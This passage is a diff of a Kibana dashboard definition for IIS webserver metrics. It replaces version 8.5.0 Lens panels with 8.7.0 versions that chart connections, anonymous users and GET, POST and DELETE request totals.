"metrics-*", - "name": "indexpattern-datasource-layer-ec54661b-482d-438e-b841-7ef6909d49a4", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "ec54661b-482d-438e-b841-7ef6909d49a4": { - "columnOrder": [ - "9853690d-6517-4282-b8ed-33f98569a178", - "6f34392d-0eaf-45d3-9b36-54bcbc83e644", - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X0", - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1" - ], - "columns": { - "6f34392d-0eaf-45d3-9b36-54bcbc83e644": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.maximum_connections))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.maximum_connections))", - "isFormulaBroken": false - }, - "references": [ - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1" - ], - "scale": "ratio" - }, - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": 
"iis.webserver.network.maximum_connections: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.maximum_connections))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.maximum_connections" - }, - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.maximum_connections))", - "operationType": "overall_max", - "references": [ - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X0" - ], - "scale": "ratio" - }, - "9853690d-6517-4282-b8ed-33f98569a178": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.maximum_connections: *" - }, - "isBucketed": false, - "label": "Maximum Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.maximum_connections" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#68CCCA", - "layerId": "ec54661b-482d-438e-b841-7ef6909d49a4", - "layerType": "data", - "maxAccessor": "6f34392d-0eaf-45d3-9b36-54bcbc83e644", - "metricAccessor": "9853690d-6517-4282-b8ed-33f98569a178", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Maximum Connections" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "73702fa8-d011-45cc-af6c-9dd7c55701d9", + "w": 9, + "x": 39, + "y": 0 + }, + "panelIndex": "73702fa8-d011-45cc-af6c-9dd7c55701d9", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": 
"indexpattern-datasource-layer-3221f0ac-7ba8-4ca4-95fb-e81242261449", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "3221f0ac-7ba8-4ca4-95fb-e81242261449": { + "columnOrder": [ + "f990e733-b6b7-4e94-a686-3761d6105b9c", + "f990e733-b6b7-4e94-a686-3761d6105b9cX0", + "f990e733-b6b7-4e94-a686-3761d6105b9cX1", + "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91" + ], + "columns": { + "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.total_connection_attempts: *" + }, + "isBucketed": false, + "label": "Total Connection Attempts", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_connection_attempts" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 9, - "i": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a", - "w": 10, - "x": 29, - "y": 0 - }, - "panelIndex": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a", - "title": "Maximum Connections", - "type": "lens", - "version": "8.5.0" + "f990e733-b6b7-4e94-a686-3761d6105b9c": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.total_connection_attempts))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.total_connection_attempts))", + "isFormulaBroken": false + }, + "references": [ + "f990e733-b6b7-4e94-a686-3761d6105b9cX1" + ], + "scale": "ratio" + }, + "f990e733-b6b7-4e94-a686-3761d6105b9cX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.total_connection_attempts: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.total_connection_attempts))", + "operationType": 
"last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_connection_attempts" + }, + "f990e733-b6b7-4e94-a686-3761d6105b9cX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.total_connection_attempts))", + "operationType": "overall_max", + "references": [ + "f990e733-b6b7-4e94-a686-3761d6105b9cX0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#FB9E00", + "layerId": "3221f0ac-7ba8-4ca4-95fb-e81242261449", + "layerType": "data", + "maxAccessor": "f990e733-b6b7-4e94-a686-3761d6105b9c", + "metricAccessor": "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-3221f0ac-7ba8-4ca4-95fb-e81242261449", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "3221f0ac-7ba8-4ca4-95fb-e81242261449": { - "columnOrder": [ - "f990e733-b6b7-4e94-a686-3761d6105b9c", - "f990e733-b6b7-4e94-a686-3761d6105b9cX0", - "f990e733-b6b7-4e94-a686-3761d6105b9cX1", - "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91" - ], - "columns": { - "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.total_connection_attempts: *" - }, - "isBucketed": false, - "label": "Total Connection Attempts", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_connection_attempts" - }, - "f990e733-b6b7-4e94-a686-3761d6105b9c": { - "dataType": "number", - "isBucketed": false, - "label": 
"overall_max(last_value(iis.webserver.network.total_connection_attempts))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.total_connection_attempts))", - "isFormulaBroken": false - }, - "references": [ - "f990e733-b6b7-4e94-a686-3761d6105b9cX1" - ], - "scale": "ratio" - }, - "f990e733-b6b7-4e94-a686-3761d6105b9cX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.total_connection_attempts: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_connection_attempts))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_connection_attempts" - }, - "f990e733-b6b7-4e94-a686-3761d6105b9cX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_connection_attempts))", - "operationType": "overall_max", - "references": [ - "f990e733-b6b7-4e94-a686-3761d6105b9cX0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#FB9E00", - "layerId": "3221f0ac-7ba8-4ca4-95fb-e81242261449", - "layerType": "data", - "maxAccessor": "f990e733-b6b7-4e94-a686-3761d6105b9c", - "metricAccessor": "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Connection Attempts" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "c523cd66-328a-41e9-bce9-1e1f95bae5de", + "w": 5, + "x": 0, + "y": 5 + }, + "panelIndex": "c523cd66-328a-41e9-bce9-1e1f95bae5de", + "embeddableConfig": { + "attributes": { + 
"references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-4c16bca9-c2d9-43d0-ae94-22640d5d1137", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "4c16bca9-c2d9-43d0-ae94-22640d5d1137": { + "columnOrder": [ + "4bab5c46-e3e5-47e0-be7b-e2e629489c37", + "7ec66ded-570f-443c-b240-5b9ae05a154f", + "7ec66ded-570f-443c-b240-5b9ae05a154fX0", + "7ec66ded-570f-443c-b240-5b9ae05a154fX1" + ], + "columns": { + "4bab5c46-e3e5-47e0-be7b-e2e629489c37": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_anonymous_users: *" + }, + "isBucketed": false, + "label": "Current Anonymous Users", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_anonymous_users" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 9, - "i": "73702fa8-d011-45cc-af6c-9dd7c55701d9", - "w": 9, - "x": 39, - "y": 0 - }, - "panelIndex": "73702fa8-d011-45cc-af6c-9dd7c55701d9", - "title": "Total Connection Attempts", - "type": "lens", - "version": "8.5.0" + "7ec66ded-570f-443c-b240-5b9ae05a154f": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.current_anonymous_users))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.current_anonymous_users))", + "isFormulaBroken": false + }, + "references": [ + "7ec66ded-570f-443c-b240-5b9ae05a154fX1" + ], + "scale": "ratio" + }, + "7ec66ded-570f-443c-b240-5b9ae05a154fX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_anonymous_users: *" + }, + "isBucketed": false, + "label": "Part of 
overall_max(last_value(iis.webserver.network.current_anonymous_users))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_anonymous_users" + }, + "7ec66ded-570f-443c-b240-5b9ae05a154fX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.current_anonymous_users))", + "operationType": "overall_max", + "references": [ + "7ec66ded-570f-443c-b240-5b9ae05a154fX0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#31D315", + "layerId": "4c16bca9-c2d9-43d0-ae94-22640d5d1137", + "layerType": "data", + "maxAccessor": "7ec66ded-570f-443c-b240-5b9ae05a154f", + "metricAccessor": "4bab5c46-e3e5-47e0-be7b-e2e629489c37", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-4c16bca9-c2d9-43d0-ae94-22640d5d1137", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "4c16bca9-c2d9-43d0-ae94-22640d5d1137": { - "columnOrder": [ - "4bab5c46-e3e5-47e0-be7b-e2e629489c37", - "7ec66ded-570f-443c-b240-5b9ae05a154f", - "7ec66ded-570f-443c-b240-5b9ae05a154fX0", - "7ec66ded-570f-443c-b240-5b9ae05a154fX1" - ], - "columns": { - "4bab5c46-e3e5-47e0-be7b-e2e629489c37": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_anonymous_users: *" - }, - "isBucketed": false, - "label": "Current Anonymous Users", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_anonymous_users" - }, - "7ec66ded-570f-443c-b240-5b9ae05a154f": { - "dataType": "number", - 
"isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.current_anonymous_users))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.current_anonymous_users))", - "isFormulaBroken": false - }, - "references": [ - "7ec66ded-570f-443c-b240-5b9ae05a154fX1" - ], - "scale": "ratio" - }, - "7ec66ded-570f-443c-b240-5b9ae05a154fX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_anonymous_users: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_anonymous_users))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_anonymous_users" - }, - "7ec66ded-570f-443c-b240-5b9ae05a154fX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_anonymous_users))", - "operationType": "overall_max", - "references": [ - "7ec66ded-570f-443c-b240-5b9ae05a154fX0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#31D315", - "layerId": "4c16bca9-c2d9-43d0-ae94-22640d5d1137", - "layerType": "data", - "maxAccessor": "7ec66ded-570f-443c-b240-5b9ae05a154f", - "metricAccessor": "4bab5c46-e3e5-47e0-be7b-e2e629489c37", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Current Anonymous Users" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "cbb280fb-dbc3-4b82-9c48-788c4254619d", + "w": 5, + "x": 5, + "y": 5 + }, + "panelIndex": "cbb280fb-dbc3-4b82-9c48-788c4254619d", + "embeddableConfig": { + 
"attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "264d96bd-c47d-47c0-bb24-eb3d1a4dd46a": { + "columnOrder": [ + "8b88a552-aee2-4ae6-969f-c86a52662140", + "a142e987-a48e-4795-aab6-697aeeebe0c1", + "a142e987-a48e-4795-aab6-697aeeebe0c1X0", + "a142e987-a48e-4795-aab6-697aeeebe0c1X1" + ], + "columns": { + "8b88a552-aee2-4ae6-969f-c86a52662140": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.total_anonymous_users: *" + }, + "isBucketed": false, + "label": "Total Anonymous Users", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_anonymous_users" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 8, - "i": "c523cd66-328a-41e9-bce9-1e1f95bae5de", - "w": 5, - "x": 0, - "y": 5 - }, - "panelIndex": "c523cd66-328a-41e9-bce9-1e1f95bae5de", - "title": "Current Anonymous Users", - "type": "lens", - "version": "8.5.0" + "a142e987-a48e-4795-aab6-697aeeebe0c1": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.total_anonymous_users))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.total_anonymous_users))", + "isFormulaBroken": false + }, + "references": [ + "a142e987-a48e-4795-aab6-697aeeebe0c1X1" + ], + "scale": "ratio" + }, + "a142e987-a48e-4795-aab6-697aeeebe0c1X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.total_anonymous_users: *" + }, + "isBucketed": false, + "label": "Part of 
overall_max(last_value(iis.webserver.network.total_anonymous_users))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_anonymous_users" + }, + "a142e987-a48e-4795-aab6-697aeeebe0c1X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.total_anonymous_users))", + "operationType": "overall_max", + "references": [ + "a142e987-a48e-4795-aab6-697aeeebe0c1X0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#1544D3", + "layerId": "264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", + "layerType": "data", + "maxAccessor": "a142e987-a48e-4795-aab6-697aeeebe0c1", + "metricAccessor": "8b88a552-aee2-4ae6-969f-c86a52662140", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Anonymous Users" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "89279953-dda3-4340-b049-bb52c2cbbeb8", + "w": 38, + "x": 10, + "y": 9 + }, + "panelIndex": "89279953-dda3-4340-b049-bb52c2cbbeb8", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-61df5fc7-b10c-4aba-9ef7-4f40a34d9419", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8238eaa5-3c3c-46e9-9a09-abee137c1fbf", + 
"type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "61df5fc7-b10c-4aba-9ef7-4f40a34d9419": { + "columnOrder": [ + "60bf28a7-9653-4be5-b5d3-9440ac2fb976", + "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" + ], + "columns": { + "60bf28a7-9653-4be5-b5d3-9440ac2fb976": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e3e9750c-ab86-4e3b-8ef8-ba4e958722be": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Get Requests", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "264d96bd-c47d-47c0-bb24-eb3d1a4dd46a": { - "columnOrder": [ - "8b88a552-aee2-4ae6-969f-c86a52662140", - "a142e987-a48e-4795-aab6-697aeeebe0c1", - "a142e987-a48e-4795-aab6-697aeeebe0c1X0", - "a142e987-a48e-4795-aab6-697aeeebe0c1X1" - ], - "columns": { - "8b88a552-aee2-4ae6-969f-c86a52662140": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.total_anonymous_users: *" - }, - "isBucketed": false, - "label": "Total Anonymous Users", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_anonymous_users" - }, - "a142e987-a48e-4795-aab6-697aeeebe0c1": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.total_anonymous_users))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.total_anonymous_users))", - "isFormulaBroken": false - }, - "references": [ - 
"a142e987-a48e-4795-aab6-697aeeebe0c1X1" - ], - "scale": "ratio" - }, - "a142e987-a48e-4795-aab6-697aeeebe0c1X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.total_anonymous_users: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_anonymous_users))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_anonymous_users" - }, - "a142e987-a48e-4795-aab6-697aeeebe0c1X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_anonymous_users))", - "operationType": "overall_max", - "references": [ - "a142e987-a48e-4795-aab6-697aeeebe0c1X0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#1544D3", - "layerId": "264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", - "layerType": "data", - "maxAccessor": "a142e987-a48e-4795-aab6-697aeeebe0c1", - "metricAccessor": "8b88a552-aee2-4ae6-969f-c86a52662140", - "progressDirection": "horizontal" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_get_requests" + } + }, + "incompleteColumns": {} + }, + "6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42": { + "columnOrder": [ + "bd0259dd-9745-4775-959f-b23323d92557", + "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" + ], + "columns": { + "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Delete Requests", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_delete_requests" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" 
+ "bd0259dd-9745-4775-959f-b23323d92557": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 8, - "i": "cbb280fb-dbc3-4b82-9c48-788c4254619d", - "w": 5, - "x": 5, - "y": 5 - }, - "panelIndex": "cbb280fb-dbc3-4b82-9c48-788c4254619d", - "title": "Total Anonymous Users", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-61df5fc7-b10c-4aba-9ef7-4f40a34d9419", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8238eaa5-3c3c-46e9-9a09-abee137c1fbf", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "61df5fc7-b10c-4aba-9ef7-4f40a34d9419": { - "columnOrder": [ - "60bf28a7-9653-4be5-b5d3-9440ac2fb976", - "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" - ], - "columns": { - "60bf28a7-9653-4be5-b5d3-9440ac2fb976": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e3e9750c-ab86-4e3b-8ef8-ba4e958722be": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Get Requests", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": 
"iis.webserver.network.total_get_requests" - } - }, - "incompleteColumns": {} - }, - "6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42": { - "columnOrder": [ - "bd0259dd-9745-4775-959f-b23323d92557", - "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" - ], - "columns": { - "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Delete Requests", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_delete_requests" - }, - "bd0259dd-9745-4775-959f-b23323d92557": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - "8238eaa5-3c3c-46e9-9a09-abee137c1fbf": { - "columnOrder": [ - "71364c0c-46e6-47c9-8ebf-7badce75f44e", - "15e96662-9271-4462-9248-089a5b1f6049" - ], - "columns": { - "15e96662-9271-4462-9248-089a5b1f6049": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Post Requests", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_post_requests" - }, - "71364c0c-46e6-47c9-8ebf-7badce75f44e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": 
{ - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" - ], - "layerId": "61df5fc7-b10c-4aba-9ef7-4f40a34d9419", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "60bf28a7-9653-4be5-b5d3-9440ac2fb976", - "yConfig": [ - { - "axisMode": "left", - "color": "#3185FC", - "forAccessor": "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" - } - ] - }, - { - "accessors": [ - "15e96662-9271-4462-9248-089a5b1f6049" - ], - "layerId": "8238eaa5-3c3c-46e9-9a09-abee137c1fbf", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "71364c0c-46e6-47c9-8ebf-7badce75f44e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68BC00", - "forAccessor": "15e96662-9271-4462-9248-089a5b1f6049" - } - ] - }, - { - "accessors": [ - "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" - ], - "layerId": "6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "bd0259dd-9745-4775-959f-b23323d92557", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(149,0,188,1)", - "forAccessor": "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "" + "8238eaa5-3c3c-46e9-9a09-abee137c1fbf": { + 
"columnOrder": [ + "71364c0c-46e6-47c9-8ebf-7badce75f44e", + "15e96662-9271-4462-9248-089a5b1f6049" + ], + "columns": { + "15e96662-9271-4462-9248-089a5b1f6049": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Post Requests", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_post_requests" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "71364c0c-46e6-47c9-8ebf-7badce75f44e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" + ], + "layerId": 